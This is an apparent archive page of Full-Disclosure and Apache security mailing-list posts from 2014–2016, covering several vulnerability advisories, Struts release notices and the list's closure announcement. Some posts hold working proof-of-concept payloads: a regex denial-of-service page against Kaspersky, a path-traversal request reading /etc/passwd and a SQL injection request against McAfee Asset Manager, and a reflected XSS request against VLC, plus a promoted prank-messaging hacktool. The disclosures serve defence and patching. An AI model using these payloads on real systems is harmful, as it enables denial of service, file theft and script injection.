Stefan Seelmann | 2 Jan 15:32 2016
Picon

[SECURITY] CVE-2015-5349: Apache Directory Studio command injection vulnerability

CVE-2015-5349: Apache Directory Studio command injection vulnerability

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Apache LDAP Studio 0.6.0 to 0.8.1
- Apache Directory Studio 1.0.0 to 2.0.0-M9

Description:
The CSV export didn’t escape the fields properly. Malicious users can
put specially crafted values into the LDAP server. When a user exports
that data into CSV formatted file, and subsequently opens it with a
spreadsheet application, the data is interpreted as a formula and executed.

Mitigation:
Users should upgrade to Apache Directory Studio 2.0.0-M10

Credit:
This issue was discovered by Muhammad Shahmeer Amir.

Lukasz Lenart | 8 Dec 16:37 2014
Picon
Gravatar

[ANN] Apache Struts 2.3.20 GA release available with security fix

The Apache Struts group is pleased to announce that Apache Struts
2.3.20 is available as a "General Availability" release. The GA
designation is our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating
enterprise-ready Java web applications. The framework is designed to
streamline the full development cycle, from building, to deploying, to
maintaining applications over time.

One medium security issue was solved with this release:

S2-023 Generated value of token can be predictable
* http://struts.apache.org/docs/s2-023.html

Besides that, this release contains several fixes and improvements
just to mention few of them:
- merged security fixes from version 2.3.16.1, 2.3.16.2, 2.3.16.3
- extended existing security mechanism to block access to given Java
packages and Classes
- collection Parameters for RedirectResult
- make ParametersInterceptor supports chinese in hash key by default
- themes.properties can be loaded using ServletContext allows to put
template folder under WEB-INF or on classpath
- new tag datetextfield
- only valid Ognl expressions are cached
- custom TextProvider can be used for validation errors of model driven actions
- datetimepicker's label fixed
- PropertiesJudge removed and properties are checked in SecurityMemberAccess
- resource reloading works in IBM JVM
- default reloading settings were removed from default.properties
(Continue reading)

Lukasz Lenart | 8 Dec 16:37 2014
Picon
Gravatar

[ANN] Apache Struts 2.3.20 GA release available with security fix

The Apache Struts group is pleased to announce that Apache Struts
2.3.20 is available as a "General Availability" release. The GA
designation is our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating
enterprise-ready Java web applications. The framework is designed to
streamline the full development cycle, from building, to deploying, to
maintaining applications over time.

One medium security issue was solved with this release:

S2-023 Generated value of token can be predictable
* http://struts.apache.org/docs/s2-023.html

Besides that, this release contains several fixes and improvements
just to mention few of them:
- merged security fixes from version 2.3.16.1, 2.3.16.2, 2.3.16.3
- extended existing security mechanism to block access to given Java
packages and Classes
- collection Parameters for RedirectResult
- make ParametersInterceptor supports chinese in hash key by default
- themes.properties can be loaded using ServletContext allows to put
template folder under WEB-INF or on classpath
- new tag datetextfield
- only valid Ognl expressions are cached
- custom TextProvider can be used for validation errors of model driven actions
- datetimepicker's label fixed
- PropertiesJudge removed and properties are checked in SecurityMemberAccess
- resource reloading works in IBM JVM
- default reloading settings were removed from default.properties
(Continue reading)

Lukasz Lenart | 26 Apr 20:46 2014
Picon
Gravatar

[ANN] Struts 2.3.16.2 GA release available - security fix

The Apache Struts group is pleased to announce that Struts 2.3.16.2 is
available as a "General Availability" release.The GA designation is
our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating
enterprise-ready Java web applications. The framework is designed to
streamline the full development cycle, from building, to deploying, to
maintaining applications over time.

This release includes important security fixes:
- S2-021 - Improves excluded params to avoid ClassLoader manipulation
via ParametersInterceptor
- S2-021 - Adds excluded params to CookieInterceptor to avoid
ClassLoader manipulation when the interceptors is configured to accept
all cookie names (wildcard matching via "*")

* http://struts.apache.org/release/2.3.x/docs/s2-021.html

All developers are strongly advised to update existing Struts 2
applications to Struts 2.3.16.2

Struts 2.3.16.2 is available in a full distribution, or as separate
library, source, example and documentation distributions, from the
releases page.
* http://struts.apache.org/download.cgi#struts23162

The release is also available from the central Maven repository under
Group ID "org.apache.struts".

The 2.3.x series of the Apache Struts framework has a minimum
(Continue reading)

Lukasz Lenart | 26 Apr 20:46 2014
Picon
Gravatar

[ANN] Struts 2.3.16.2 GA release available - security fix

The Apache Struts group is pleased to announce that Struts 2.3.16.2 is
available as a "General Availability" release.The GA designation is
our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating
enterprise-ready Java web applications. The framework is designed to
streamline the full development cycle, from building, to deploying, to
maintaining applications over time.

This release includes important security fixes:
- S2-021 - Improves excluded params to avoid ClassLoader manipulation
via ParametersInterceptor
- S2-021 - Adds excluded params to CookieInterceptor to avoid
ClassLoader manipulation when the interceptors is configured to accept
all cookie names (wildcard matching via "*")

* http://struts.apache.org/release/2.3.x/docs/s2-021.html

All developers are strongly advised to update existing Struts 2
applications to Struts 2.3.16.2

Struts 2.3.16.2 is available in a full distribution, or as separate
library, source, example and documentation distributions, from the
releases page.
* http://struts.apache.org/download.cgi#struts23162

The release is also available from the central Maven repository under
Group ID "org.apache.struts".

The 2.3.x series of the Apache Struts framework has a minimum
(Continue reading)

John Cartwright | 19 Mar 11:30 2014
Picon

Administrivia: The End

Hi

When Len and I created the Full-Disclosure list way back in July 2002,
we knew that we'd have our fair share of legal troubles along the way.  
We were right.  To date we've had all sorts of requests to delete 
things, requests not to delete things, and a variety of legal threats 
both valid or otherwise.  However, I always assumed that the turning 
point would be a sweeping request for large-scale deletion of 
information that some vendor or other had taken exception to.

I never imagined that request might come from a researcher within the 
'community' itself (and I use that word loosely in modern times).  But 
today, having spent a fair amount of time dealing with complaints from 
a particular individual (who shall remain nameless) I realised that 
I'm done.  The list has had its fair share of trolling, flooding, 
furry porn, fake exploits and DoS attacks over the years, but none of 
those things really affected the integrity of the list itself.  
However, taking a virtual hatchet to the list archives on the whim of 
an individual just doesn't feel right.  That 'one of our own' would 
undermine the efforts of the last 12 years is really the straw that 
broke the camel's back.

I'm not willing to fight this fight any longer.  It's getting harder 
to operate an open forum in today's legal climate, let alone a 
security-related one.  There is no honour amongst hackers any more.  
There is no real community.  There is precious little skill.  The 
entire security game is becoming more and more regulated.  This is all 
a sign of things to come, and a reflection on the sad state of an 
industry that should never have become an industry.

(Continue reading)

AWeber Test | 18 Mar 18:05 2014
Picon

USSD Sender Hacktool 1.0

What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to make requests to a mobile operator. If you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for example *#100# to the vodafone network, you will receive an USSD message as a result.

USSD Sender Hacktool is a complex tool that let any web user to send a text message in a USSD command to any number. By default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up with the text and a OK butto n. If it get's undelivered an actual sms will be send.

Screen Shot:
http://i492.photobucket.com/albums/rr287/tribalmp/USSDSenderHacktool.jpg

Download:
http://www.firedrive.com/file/C961587BD8BCD4C9
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[CXSEC] | 18 Mar 23:37 2014

Kaspersky 14.0.0.4651 RegExp Remote Denial of Service PoC2

Kaspersky has released updated for first PoC presented here


but there are still many combinations of evil patterns. For exmaple next PoC2 is available here


code:

------
<HTML>
<HEAD>
<TITLE>RegExp Resource Exhaustion </TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<SCRIPT type="text/javascript">
var patt1=new
RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)");
document.write(patt1.exec("peace"));
</SCRIPT>
</BODY>
</HTML>
------

These expression leads to hang up kaspersky process by CPU Exhaustion.  Making it impossible to shut down and restart Kaspersky GUI. 
A weak implementation of RE difficult defense against this type of attack.
In my opinion the most stable implementation of regular expressions is NetBSD/OpenBSD where the authors have reduced the risk of leakage of resources by the level of recursion.

References:

Best regards,
CXSEC TEAM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
scadastrangelove | 19 Mar 07:44 2014
Picon

All your PLC are belong to us (2)

Fixes for Siemens S7 1500 PLC are published.
Thanks to Yury Goltsev, Ilya Karpov, Alexey Osipov, Dmitry Serebryannikov and Alex Timorin.
There are a lot of, but Authentication bypass (INSUFFICIENT ENTROPY/CVE-2014-2251) is the best.


More details are pending.

Regards,
SCADA StrangeLove team
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Brandon Perry | 18 Mar 20:20 2014
Picon
Gravatar

McAfee Cloud SSO and McAfee Asset Manager vulns

  1. Cloud SSO is vuln to unauthed XSS in the authentication audit form:



  1. McAfee Asset Manager v6.6 multiple vulnerabilities
  2.  
  3.  
  4. Authenticated arbitrary file read
  5. An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality. By generating a report, the user’s browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd.
  6.  
  7. GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1
  8. Host: 172.31.16.167
  9. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  11. Accept-Language: en-US,en;q=0.5
  12. Accept-Encoding: gzip, deflate
  13. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
  14. Connection: keep-alive
  15.  
  16.  
  17.  
  18.  
  19.  
  20. Authenticated SQL injection
  21. An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the ‘user’ parameter is susceptible to the SQL injection:
  22.  
  23. POST /jsp/reports/ReportsAudit.jsp HTTP/1.1
  24. Host: 172.31.16.167
  25. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  26. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  27. Accept-Language: en-US,en;q=0.5
  28. Accept-Encoding: gzip, deflate
  29. Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
  30. Connection: keep-alive
  31. Content-Type: application/x-www-form-urlencoded
  32. Content-Length: 91
  33.  
  34. fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Francesco Perna | 18 Mar 13:38 2014
Picon

[Quantum Leap Advisory] #QLA140216 - VLC Reflected XSS vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== Details ===
Advisory: http://www.quantumleap.it/vlc-reflected-xss-vulnerability/
Affected Product: VLC
Version: 2.1.3 (older versions may be affected too)

=== Executive Summary ===
Using a specially crafted HTTP request, it is possible to exploit a lack
in the neutralization[1] of the error pages output which includes the
user submitted content. Successful exploitation of the vulnerabilities,
results in the execution of arbitrary HTML and script code in user?s
browser in context of the vulnerable website trough a ?Reflected XSS?

=== Proof of Concept ===
It has been discovered a reflected XSS vulnerability on error page in
VLC Web Interface. The function ?httpd_HtmlError? in file
?src/network/httpd.c? doesn?t sanitize the ?url? parameter, so an XSS
attack can be executed. Below you can find a proof of concept of the
vulnerability:

GET /te<script>alert(?XSS?);</script>st HTTP/1.1
Host: 192.168.1.101:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic OmNpYW8=
Connection: keep-alive

=== Solution ===
To quickly fix the security issue, in our Customer?s environment, we
wrote the following small patch:

<patch>
? httpd.c    2014-02-14 15:24:55.393978968 +0100
+++ httpd.patched.c    2014-02-14 15:24:44.404625054 +0100
 <at>  <at>  -256,9 +256,12  <at>  <at>  static const char *httpd_ReasonFromCode(static
size_t httpd_HtmlError (char **body, int code, const char *url)
{
+    char *url_Encoded = NULL;
const char *errname = httpd_ReasonFromCode (code);
assert (errname != NULL);+    url_Encoded = convert_xml_special_chars
(url ? url : ??);
+
int res = asprintf (body,
?<?xml version=?1.0? encoding=?ascii? ?>n?
?<!DOCTYPE html PUBLIC ?-//W3C//DTD XHTML 1.0 Strict//EN?"
 <at>  <at>  -273,7 +276,9  <at>  <at>  static size_t httpd_HtmlError (char **bo
?<a href=?http://www.videolan.org?>VideoLAN</a>n?
?</body>n?
?</html>n?, errname, code, errname,
- -        (url ? ? (? : ??), (url ? url : ??), (url ? ?)? : ??));
+        (url_Encoded ? ? (? : ??), (url_Encoded ? url_Encoded : ??),
(url_Encoded ? ?)? : ??));
+
+    free (url_Encoded);if (res == -1)
{
</patch>

This patch has been merged with the Main Line of the VLC GIT
repository[2],  it will be officially released in the build 2.2.0

=== Disclosoure Timeline ===

2013-12-02 ? Vulnerability Discovered
2014-02-15 ? Initial vendor notification
2014-02-20 ? The vendor fixed the vulnerability
2014-03-18 ? Public advisory

=== Discovered by ===
Vulnerability discovered by Francesco Perna and Pietro Minniti of
Quantum Leap s.r.l

=== References ===
[1]
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[2]
http://git.videolan.org/?p=vlc.git;a=commit;h=fe5063ec5ad1873039ea719eb1f137c8f3bda84b

- -- 
Francesco Perna
Quantum Leap SRL
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEbBAEBAgAGBQJTKD4tAAoJEPBLO12s/SuDhEMH+K7vy+JqXc47ADWCmyokJ3Bu
8VOZOH9lxt2wyHOD5tlf4tIQv6vQ2adGuSps16OIHRJ0KZ32PSJmBogHtPAsXFwP
i8ubs7Co6lNVwbfLGz5TQkZw+lfudUJ3VEaEHRtxEEao2mb7YcafmRFMV+rsdB+E
mgXdMy85G9tU/TDwi0//KBXCXmSFAHlEsaVlNVhqAUz3Eyg4hk9jOjaDat7ESt5Y
yfd3uSO2yWthI6gJH2cLI5Y1R1L5zr4/raxM44/lZHm+XFOviiiX2L/NNpedwnn6
Ax8y38AvQ8gFYvDtY+0tP4vBRrRAwzvGIZgSKdmeNMK+CpUvr+hZX53zVpTCPA==
=sPV+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Gmane